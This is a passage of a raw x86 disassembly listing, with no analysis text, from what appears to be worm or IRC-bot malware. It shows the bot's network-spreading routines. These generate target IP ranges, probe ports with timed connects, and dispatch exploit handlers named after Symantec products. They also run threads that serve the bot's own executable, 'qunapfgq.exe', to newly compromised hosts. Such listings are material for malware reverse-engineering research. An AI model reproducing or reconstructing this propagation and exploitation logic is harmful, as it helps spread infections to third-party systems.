mov ebp, esp
sub esp, 200h
push dword_4CB714
call sub_41ADD8
pop ecx
push eax
lea eax, [ebp+var_200]
push dword_4CE718
push offset unk_431BFC
push eax
call sub_41C266
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
lea eax, [ebp+var_200]
push eax
call sub_415D38
add esp, 28h
leave
retn
sub_40BA49 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BA9E proc near ; CODE XREF: sub_401ACD+2A70�p
var_1000 = byte ptr -1000h
var_800 = byte ptr -800h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 1000h
call sub_41C500
push edi
lea eax, [ebp+var_800]
push offset dword_431C48
push eax
call sub_41C266
cmp dword_4317F8, 0
pop ecx
pop ecx
mov edi, 800h
jz short loc_40BB0A
push esi
mov esi, offset aSymantec ; "Symantec"
loc_40BAD3: ; CODE XREF: sub_40BA9E+69�j
lea eax, [esi-0Ah]
push eax
push esi
lea eax, [ebp+var_1000]
push offset dword_431C38
push eax
call sub_41C266
lea eax, [ebp+var_1000]
push edi
push eax
lea eax, [ebp+var_800]
push eax
call sub_41CBC0
add esi, 40h
add esp, 1Ch
cmp dword ptr [esi+1Eh], 0
jnz short loc_40BAD3
pop esi
loc_40BB0A: ; CODE XREF: sub_40BA9E+2D�j
push dword_4CB714
call sub_41ADD8
pop ecx
push eax
lea eax, [ebp+var_1000]
push offset aScanTimeS_ ; " Scan Time: %s."
push eax
call sub_41C266
lea eax, [ebp+var_1000]
push edi
push eax
lea eax, [ebp+var_800]
push eax
call sub_41CBC0
push 0
lea eax, [ebp+var_800]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
lea eax, [ebp+var_800]
push eax
call sub_415D38
add esp, 30h
pop edi
leave
retn
sub_40BA9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BB65 proc near ; DATA XREF: sub_401ACD+309A�o
var_3F0 = byte ptr -3F0h
var_1F0 = dword ptr -1F0h
var_1EC = byte ptr -1ECh
var_1DC = byte ptr -1DCh
var_15C = byte ptr -15Ch
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_134 = byte ptr -134h
var_124 = byte ptr -124h
var_A4 = byte ptr -0A4h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3F0h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Bh
mov esi, eax
pop ecx
lea edi, [ebp+var_134]
rep movsd
mov dword ptr [eax+128h], 1
lea eax, [ebp+var_134]
push eax
call dword_4CBA14 ; inet_addr
xor edi, edi
mov [ebp+var_8], eax
cmp dword_4317F8, edi
mov [ebp+var_4], edi
mov [ebp+arg_0], edi
jz loc_40BCC7
mov ebx, offset dword_4317F8
mov eax, ebx
loc_40BBB6: ; CODE XREF: sub_40BB65+15C�j
push [ebp+var_1C]
push dword ptr [eax]
push [ebp+var_8]
call sub_40C34B
add esp, 0Ch
cmp eax, 1
jnz loc_40BCB7
push dword ptr [ebx]
lea esi, [ebx-28h]
lea eax, [ebp+var_134]
push eax
lea eax, [esi+0Ah]
push eax
lea eax, [ebp+var_3F0]
push offset unk_431C98
push eax
call sub_41C266
push edi
lea eax, [ebp+var_3F0]
push [ebp+var_14]
push eax
lea eax, [ebp+var_124]
push eax
push [ebp+var_24]
call sub_409869
lea eax, [ebp+var_3F0]
push eax
call sub_415D38
add esp, 2Ch
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_1EC]
push eax
call sub_41C266
pop ecx
lea eax, [ebp+var_15C]
pop ecx
push esi
push eax
call sub_41C266
cmp [ebp+var_A4], 0
pop ecx
pop ecx
lea eax, [ebp+var_A4]
jnz short loc_40BC52
lea eax, [ebp+var_124]
loc_40BC52: ; CODE XREF: sub_40BB65+E5�j
push eax
lea eax, [ebp+var_1DC]
push eax
call sub_41C266
mov eax, [ebp+var_24]
pop ecx
mov [ebp+var_1F0], eax
mov eax, [ebp+var_14]
mov [ebp+var_140], eax
mov eax, [ebp+var_10]
pop ecx
mov [ebp+var_13C], eax
mov eax, [ebx]
sub esp, 0BCh
mov [ebp+var_150], eax
mov eax, [ebp+var_18]
push 2Fh
mov [ebp+var_14C], eax
mov eax, [ebp+arg_0]
pop ecx
lea esi, [ebp+var_1F0]
mov edi, esp
mov [ebp+var_148], eax
rep movsd
call dword ptr [ebx+4]
add esp, 0BCh
inc [ebp+var_4]
xor edi, edi
loc_40BCB7: ; CODE XREF: sub_40BB65+64�j
inc [ebp+arg_0]
add ebx, 40h
mov eax, ebx
cmp [ebx], edi
jnz loc_40BBB6
loc_40BCC7: ; CODE XREF: sub_40BB65+44�j
push [ebp+var_4]
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_3F0]
push offset unk_431C64
push eax
call sub_41C266
push edi
lea eax, [ebp+var_3F0]
push [ebp+var_14]
push eax
lea eax, [ebp+var_124]
push eax
push [ebp+var_24]
call sub_409869
lea eax, [ebp+var_3F0]
push eax
call sub_415D38
push [ebp+var_18]
call sub_40B6D6
add esp, 2Ch
push edi
call ds:dword_4270D4 ; ExitThread
sub_40BB65 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BD1A proc near ; CODE XREF: sub_401ACD+23F4�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 0Bh
call sub_40B602
test eax, eax
pop ecx
jle short loc_40BD56
mov eax, [ebp+arg_C]
push dword_4CBB20[eax*8]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+var_200]
push offset unk_431CE8
push eax
call sub_41C266
add esp, 0Ch
jmp short loc_40BD69
; ---------------------------------------------------------------------------
loc_40BD56: ; CODE XREF: sub_40BD1A+13�j
lea eax, [ebp+var_200]
push offset unk_431CC8
push eax
call sub_41C266
pop ecx
pop ecx
loc_40BD69: ; CODE XREF: sub_40BD1A+3A�j
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
lea eax, [ebp+var_200]
push eax
call sub_415D38
add esp, 18h
leave
retn
sub_40BD1A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BD91 proc near ; CODE XREF: sub_40C600+4F�p
var_210 = dword ptr -210h
var_204 = byte ptr -204h
var_4 = byte ptr -4
arg_10 = byte ptr 18h
arg_90 = byte ptr 98h
arg_110 = dword ptr 118h
arg_130 = dword ptr 138h
arg_138 = dword ptr 140h
arg_13C = dword ptr 144h
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ebp+arg_130]
push ebx
cmp eax, 0FFFFFFFFh
push esi
jz loc_40C263
shl eax, 6
xor ebx, ebx
cmp dword_431804[eax], ebx
jz loc_40C263
push 5
call sub_40B602
test eax, eax
pop ecx
jnz loc_40C018
mov eax, dword_429078
push edi
mov esi, offset dword_4CDBDC
push 104h
push esi
push ebx
mov dword_4CDDEC, eax
mov dword_4CDDE8, ebx
call ds:dword_427078 ; GetModuleFileNameA
mov edi, offset aQunapfgq_exe ; "qunapfgq.exe"
push 103h
push edi
push offset dword_4CDCE0
call sub_41BFD0
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov dword_4CDBD8, eax
mov eax, [ebp+arg_138]
push 7Fh
mov dword_4CDE70, eax
jnz short loc_40BE44
lea eax, [ebp+arg_10]
push eax
push offset dword_4CDDF0
call sub_41BFD0
add esp, 0Ch
mov dword_4CDE74, 1
jmp short loc_40BE5E
; ---------------------------------------------------------------------------
loc_40BE44: ; CODE XREF: sub_40BD91+94�j
lea eax, [ebp+arg_90]
push eax
push offset dword_4CDDF0
call sub_41BFD0
add esp, 0Ch
mov dword_4CDE74, ebx
loc_40BE5E: ; CODE XREF: sub_40BD91+B1�j
push esi
lea eax, [ebp+var_204]
push dword_4CDDEC
push offset unk_42C204
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_204]
push 5
push eax
call sub_40B3BA
add esp, 1Ch
mov dword_4CDDE4, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4CDBD8
push offset sub_412197
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, dword_4CDDE4
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_40BECC
loc_40BEBA: ; CODE XREF: sub_40BD91+139�j
cmp dword_4CDE78, ebx
jnz short loc_40BEE7
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_40BEBA
; ---------------------------------------------------------------------------
loc_40BECC: ; CODE XREF: sub_40BD91+127�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_204]
push offset unk_431E08
push eax
call sub_41C266
add esp, 0Ch
loc_40BEE7: ; CODE XREF: sub_40BD91+12F�j
lea eax, [ebp+var_204]
push eax
call sub_415D38
mov eax, dword_4CB710
mov esi, offset dword_4CDE84
mov [esp+210h+var_210], 104h
push esi
push ebx
mov dword_4CE094, eax
mov dword_4CE090, ebx
call ds:dword_427078 ; GetModuleFileNameA
push 103h
push edi
push offset dword_4CDF88
call sub_41BFD0
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov dword_4CDE80, eax
mov eax, [ebp+arg_138]
pop edi
mov dword_4CE118, eax
push 7Fh
jnz short loc_40BF68
lea eax, [ebp+arg_10]
push eax
push offset dword_4CE098
call sub_41BFD0
add esp, 0Ch
mov dword_4CE11C, 1
jmp short loc_40BF82
; ---------------------------------------------------------------------------
loc_40BF68: ; CODE XREF: sub_40BD91+1B8�j
lea eax, [ebp+arg_90]
push eax
push offset dword_4CE098
call sub_41BFD0
add esp, 0Ch
mov dword_4CE11C, ebx
loc_40BF82: ; CODE XREF: sub_40BD91+1D5�j
push esi
lea eax, [ebp+var_204]
push dword_4CE094
push offset unk_431DD4
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_204]
push 4
push eax
call sub_40B3BA
add esp, 1Ch
mov dword_4CE08C, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4CDE80
push offset sub_40F3AA
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, dword_4CE08C
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_40BFF0
loc_40BFDE: ; CODE XREF: sub_40BD91+25D�j
cmp dword_4CE120, ebx
jnz short loc_40C00B
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_40BFDE
; ---------------------------------------------------------------------------
loc_40BFF0: ; CODE XREF: sub_40BD91+24B�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_204]
push offset unk_431DA0
push eax
call sub_41C266
add esp, 0Ch
loc_40C00B: ; CODE XREF: sub_40BD91+253�j
lea eax, [ebp+var_204]
push eax
call sub_415D38
pop ecx
loc_40C018: ; CODE XREF: sub_40BD91+35�j
mov eax, [ebp+arg_130]
mov ecx, eax
shl ecx, 6
cmp dword_43180C[ecx], ebx
jz loc_40C141
push 7
call sub_40B602
test eax, eax
pop ecx
jnz loc_40C13B
mov eax, dword_4CE710
cmp [ebp+arg_90], bl
mov dword_4CDB44, eax
mov eax, [ebp+arg_110]
mov dword_4CDB38, eax
mov eax, [ebp+arg_138]
mov dword_4CDB40, ebx
mov dword_4CDBC8, eax
push 7Fh
jnz short loc_40C08C
lea eax, [ebp+arg_10]
push eax
push offset dword_4CDB48
call sub_41BFD0
add esp, 0Ch
mov dword_4CDBCC, 1
jmp short loc_40C0A6
; ---------------------------------------------------------------------------
loc_40C08C: ; CODE XREF: sub_40BD91+2DC�j
lea eax, [ebp+arg_90]
push eax
push offset dword_4CDB48
call sub_41BFD0
add esp, 0Ch
mov dword_4CDBCC, ebx
loc_40C0A6: ; CODE XREF: sub_40BD91+2F9�j
push dword_4CDB44
lea eax, [ebp+var_204]
push offset unk_431D70
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_204]
push 7
push eax
call sub_40B3BA
add esp, 18h
mov dword_4CDB3C, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4CDB38
push offset sub_40F108
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, dword_4CDB3C
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_40C113
loc_40C101: ; CODE XREF: sub_40BD91+380�j
cmp dword_4CDBD0, ebx
jnz short loc_40C12E
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_40C101
; ---------------------------------------------------------------------------
loc_40C113: ; CODE XREF: sub_40BD91+36E�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_204]
push offset unk_431D38
push eax
call sub_41C266
add esp, 0Ch
loc_40C12E: ; CODE XREF: sub_40BD91+376�j
lea eax, [ebp+var_204]
push eax
call sub_415D38
pop ecx
loc_40C13B: ; CODE XREF: sub_40BD91+2A8�j
mov eax, [ebp+arg_130]
loc_40C141: ; CODE XREF: sub_40BD91+298�j
shl eax, 6
cmp dword_431808[eax], ebx
jz loc_40C263
push 3
call sub_40B602
test eax, eax
pop ecx
jnz loc_40C263
mov esi, offset dword_4CE3B4
push 104h
push esi
push ebx
call ds:dword_427078 ; GetModuleFileNameA
push 5Ch
push esi
call sub_41C820
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40C182
mov [eax], bl
loc_40C182: ; CODE XREF: sub_40BD91+3ED�j
mov eax, dword_42907C
mov dword_4CE4CC, ebx
mov dword_4CE4B8, eax
lea eax, [ebp+arg_10]
push eax
push offset dword_4CE12C
call sub_41C266
mov eax, [ebp+arg_110]
pop ecx
pop ecx
mov dword_4CE128, eax
mov ecx, [ebp+arg_138]
push esi
push dword_4CE4B8
mov dword_4CE4C4, ecx
mov ecx, [ebp+arg_13C]
push eax
mov dword_4CE4C8, ecx
call sub_40AA06
pop ecx
push eax
lea eax, [ebp+var_204]
push offset unk_42C18C
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_204]
push 3
push eax
call sub_40B3BA
add esp, 20h
mov dword_4CE4C0, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4CE128
push offset sub_40FAD6
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, dword_4CE4C0
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_40C23B
loc_40C229: ; CODE XREF: sub_40BD91+4A8�j
cmp dword_4CE4D4, ebx
jnz short loc_40C256
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_40C229
; ---------------------------------------------------------------------------
loc_40C23B: ; CODE XREF: sub_40BD91+496�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_204]
push offset unk_431D04
push eax
call sub_41C266
add esp, 0Ch
loc_40C256: ; CODE XREF: sub_40BD91+49E�j
lea eax, [ebp+var_204]
push eax
call sub_415D38
pop ecx
loc_40C263: ; CODE XREF: sub_40BD91+14�j
; sub_40BD91+25�j ...
pop esi
pop ebx
leave
retn
sub_40BD91 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C267 proc near ; CODE XREF: sub_40C3E8:loc_40C459�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
push 4
lea esi, ds:4CBB20h[eax*8]
lea eax, [ebp+arg_0]
push esi
push eax
call sub_41CD20
add esp, 0Ch
push [ebp+arg_0]
call dword_4CB8FC ; htonl
inc eax
push eax
mov [ebp+arg_0], eax
call dword_4CB9D0 ; htonl
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
push esi
call sub_41CD20
mov eax, [esi]
add esp, 0Ch
pop esi
pop ebp
retn
sub_40C267 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C2AF proc near ; CODE XREF: sub_40C3E8+69�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
or esi, 0FFFFFFFFh
push [ebp+arg_0]
mov [ebp+var_C], esi
mov [ebp+var_8], esi
mov [ebp+var_4], esi
mov [ebp+var_10], esi
call sub_41B9C0
cmp eax, 0Fh
pop ecx
jbe short loc_40C2D7
xor eax, eax
jmp short loc_40C348
; ---------------------------------------------------------------------------
loc_40C2D7: ; CODE XREF: sub_40C2AF+22�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push [ebp+arg_0]
call sub_41CCE3
add esp, 18h
cmp [ebp+var_C], esi
jnz short loc_40C304
call sub_41C2C2
mov [ebp+var_C], eax
loc_40C304: ; CODE XREF: sub_40C2AF+4B�j
cmp [ebp+var_8], esi
jnz short loc_40C311
call sub_41C2C2
mov [ebp+var_8], eax
loc_40C311: ; CODE XREF: sub_40C2AF+58�j
cmp [ebp+var_4], esi
jnz short loc_40C31E
call sub_41C2C2
mov [ebp+var_4], eax
loc_40C31E: ; CODE XREF: sub_40C2AF+65�j
mov eax, [ebp+var_10]
cmp eax, esi
jnz short loc_40C32A
call sub_41C2C2
loc_40C32A: ; CODE XREF: sub_40C2AF+74�j
shl eax, 8
add eax, [ebp+var_4]
mov ecx, [ebp+var_C]
shl eax, 8
add eax, [ebp+var_8]
shl eax, 8
add eax, ecx
mov ecx, [ebp+arg_4]
mov dword_4CBB20[ecx*8], eax
loc_40C348: ; CODE XREF: sub_40C2AF+26�j
pop esi
leave
retn
sub_40C2AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C34B proc near ; CODE XREF: sub_40BB65+59�p
; sub_40C3E8+BB�p ...
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
push 1
pop edi
xor ebx, ebx
push ebx
push edi
push 2
mov [ebp+var_4], edi
call dword_4CBA54 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40C374
xor eax, eax
jmp short loc_40C3E3
; ---------------------------------------------------------------------------
loc_40C374: ; CODE XREF: sub_40C34B+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call dword_4CB9D4 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call dword_4CBA70 ; ioctlsocket
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call dword_4CB97C ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_8], ebx
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_120]
push ebx
push eax
push ebx
push ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call dword_4CB9BC ; select
push esi
mov edi, eax
call dword_4CBA6C ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
loc_40C3E3: ; CODE XREF: sub_40C34B+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_40C34B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C3E8 proc near ; DATA XREF: sub_40C600+13B�o
var_2A8 = dword ptr -2A8h
var_28C = byte ptr -28Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_1F8 = byte ptr -1F8h
var_178 = byte ptr -178h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_150 = byte ptr -150h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_150]
rep movsd
mov esi, [ebp+var_2C]
mov dword ptr [eax+148h], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], esi
mov [ebp+arg_0], eax
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
mov ebx, esi
pop ecx
imul ebx, 234h
loc_40C42F: ; CODE XREF: sub_40C3E8+204�j
mov eax, dword_43E914[ebx]
cmp dword_4CBB24[eax*8], 0
jz loc_40C5F1
cmp [ebp+var_10], 0
push eax
jz short loc_40C459
lea eax, [ebp+var_150]
push eax
call sub_40C2AF
pop ecx
jmp short loc_40C45E
; ---------------------------------------------------------------------------
loc_40C459: ; CODE XREF: sub_40C3E8+60�j
call sub_40C267
loc_40C45E: ; CODE XREF: sub_40C3E8+6F�j
pop ecx
mov edi, eax
push [ebp+arg_0]
push dword_43E914[ebx]
push [ebp+var_3C]
push edi
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+var_28C]
push offset unk_431E64
push eax
call sub_41C266
add esp, 18h
lea eax, [ebp+var_28C]
push eax
lea eax, dword_43E710[ebx]
push eax
call sub_41C266
push [ebp+var_38]
push [ebp+var_3C]
push edi
call sub_40C34B
add esp, 14h
cmp eax, 1
jnz loc_40C5E1
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_40C535
push offset dword_4CDB20
call ds:dword_4270DC ; RtlEnterCriticalSection
push [ebp+var_3C]
push edi
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+var_28C]
push offset unk_431E3C
push eax
call sub_41C266
add esp, 10h
cmp [ebp+var_14], 0
jnz short loc_40C517
cmp [ebp+var_C0], 0
push 1
push [ebp+var_18]
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_C0]
jnz short loc_40C50B
lea eax, [ebp+var_140]
loc_40C50B: ; CODE XREF: sub_40C3E8+11B�j
push eax
push [ebp+var_40]
call sub_409869
add esp, 14h
loc_40C517: ; CODE XREF: sub_40C3E8+100�j
lea eax, [ebp+var_28C]
push eax
call sub_415D38
mov [esp+2A8h+var_2A8], offset dword_4CDB20
call ds:dword_4270D8 ; RtlLeaveCriticalSection
jmp loc_40C5E1
; ---------------------------------------------------------------------------
loc_40C535: ; CODE XREF: sub_40C3E8+D0�j
push edi
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+var_208]
push eax
call sub_41C266
mov eax, [ebp+var_20]
pop ecx
shl eax, 6
pop ecx
add eax, offset aSym ; "sym"
push eax
lea eax, [ebp+var_178]
push eax
call sub_41C266
cmp [ebp+var_C0], 0
pop ecx
pop ecx
lea eax, [ebp+var_C0]
jnz short loc_40C57A
lea eax, [ebp+var_140]
loc_40C57A: ; CODE XREF: sub_40C3E8+18A�j
push eax
lea eax, [ebp+var_1F8]
push eax
call sub_41C266
mov eax, [ebp+var_40]
pop ecx
mov [ebp+var_20C], eax
mov eax, [ebp+var_18]
pop ecx
mov [ebp+var_15C], eax
mov eax, [ebp+var_14]
sub esp, 0BCh
mov [ebp+var_158], eax
mov eax, [ebp+var_3C]
push 2Fh
mov [ebp+var_16C], eax
mov eax, [ebp+var_20]
pop ecx
mov [ebp+var_168], esi
mov [ebp+var_164], eax
lea esi, [ebp+var_20C]
mov edi, esp
shl eax, 6
rep movsd
call off_4317FC[eax]
mov esi, [ebp+var_4]
add esp, 0BCh
loc_40C5E1: ; CODE XREF: sub_40C3E8+C6�j
; sub_40C3E8+148�j
push 7D0h
call ds:dword_427080 ; Sleep
jmp loc_40C42F
; ---------------------------------------------------------------------------
loc_40C5F1: ; CODE XREF: sub_40C3E8+55�j
push esi
call sub_40B6D6
pop ecx
push 0
call ds:dword_4270D4 ; ExitThread
sub_40C3E8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C600 proc near ; DATA XREF: sub_401ACD+1F2A�o
; sub_401ACD+5B7A�o
var_1DC = dword ptr -1DCh
var_1CC = byte ptr -1CCh
var_14C = byte ptr -14Ch
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1CCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
push 1
pop ebx
rep movsd
mov [eax+144h], ebx
lea eax, [ebp+var_14C]
push eax
call dword_4CBA14 ; inet_addr
mov ecx, [ebp+var_2C]
sub esp, 14Ch
lea esi, [ebp+var_14C]
push 53h
mov dword_4CBB20[ecx*8], eax
pop ecx
mov edi, esp
rep movsd
call sub_40BD91
push 0Bh
call sub_40B602
add esp, 150h
cmp eax, ebx
jnz short loc_40C6CE
mov esi, offset dword_4CDB20
push esi
call ds:dword_4270E4 ; RtlDeleteCriticalSection
push 80000400h
push esi
call ds:dword_4270E0 ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_40C6CE
lea eax, [ebp+var_1CC]
push offset unk_431F48
push eax
call sub_41C266
xor ebx, ebx
pop ecx
cmp [ebp+var_10], ebx
pop ecx
jnz short loc_40C6B8
push ebx
lea eax, [ebp+var_1CC]
push [ebp+var_14]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_409869
add esp, 14h
loc_40C6B8: ; CODE XREF: sub_40C600+99�j
lea eax, [ebp+var_1CC]
push eax
call sub_415D38
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_40C6CE: ; CODE XREF: sub_40C600+63�j
; sub_40C600+7F�j
mov eax, [ebp+var_2C]
mov esi, ds:dword_427080
mov edi, ebx
mov dword_4CBB24[eax*8], ebx
xor ebx, ebx
cmp [ebp+var_20], 1
jb loc_40C79B
loc_40C6EC: ; CODE XREF: sub_40C600+195�j
push edi
lea eax, [ebp+var_14C]
push [ebp+var_2C]
mov [ebp+var_24], edi
push [ebp+var_38]
push eax
lea eax, [ebp+var_1CC]
push offset unk_431F14
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_1CC]
push 0Bh
push eax
call sub_40B3BA
mov [ebp+var_28], eax
imul eax, 234h
mov ecx, [ebp+var_2C]
add esp, 24h
mov dword_43E914[eax], ecx
lea eax, [ebp+var_14C]
push ebx
push ebx
push eax
push offset sub_40C3E8
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_28]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_40C766
loc_40C75B: ; CODE XREF: sub_40C600+164�j
cmp [ebp+var_4], ebx
jnz short loc_40C78D
push 1Eh
call esi ; Sleep
jmp short loc_40C75B
; ---------------------------------------------------------------------------
loc_40C766: ; CODE XREF: sub_40C600+159�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_1CC]
push offset unk_431EDC
push eax
call sub_41C266
lea eax, [ebp+var_1CC]
push eax
call sub_415D38
add esp, 10h
loc_40C78D: ; CODE XREF: sub_40C600+15E�j
push 1Eh
call esi ; Sleep
inc edi
cmp edi, [ebp+var_20]
jbe loc_40C6EC
loc_40C79B: ; CODE XREF: sub_40C600+E6�j
cmp [ebp+var_30], ebx
jz loc_40C845
mov eax, [ebp+var_30]
imul eax, 0EA60h
push eax
call esi ; Sleep
loc_40C7B0: ; CODE XREF: sub_40C600+250�j
push [ebp+var_30]
mov eax, [ebp+var_2C]
push [ebp+var_38]
mov eax, dword_4CBB20[eax*8]
push eax
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+var_1CC]
push offset unk_431E9C
push eax
call sub_41C266
add esp, 14h
cmp [ebp+var_10], ebx
jnz short loc_40C7FE
push ebx
lea eax, [ebp+var_1CC]
push [ebp+var_14]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_409869
add esp, 14h
loc_40C7FE: ; CODE XREF: sub_40C600+1DF�j
lea eax, [ebp+var_1CC]
push eax
call sub_415D38
mov eax, [ebp+var_2C]
mov [esp+1DCh+var_1DC], 0BB8h
mov dword_4CBB24[eax*8], ebx
call esi ; Sleep
push 0Bh
call sub_40B602
cmp eax, 1
pop ecx
jnz short loc_40C835
push offset dword_4CDB20
call ds:dword_4270E4 ; RtlDeleteCriticalSection
loc_40C835: ; CODE XREF: sub_40C600+228�j
push [ebp+var_2C]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_40C845: ; CODE XREF: sub_40C600+19E�j
; sub_40C600+25D�j
mov eax, [ebp+var_2C]
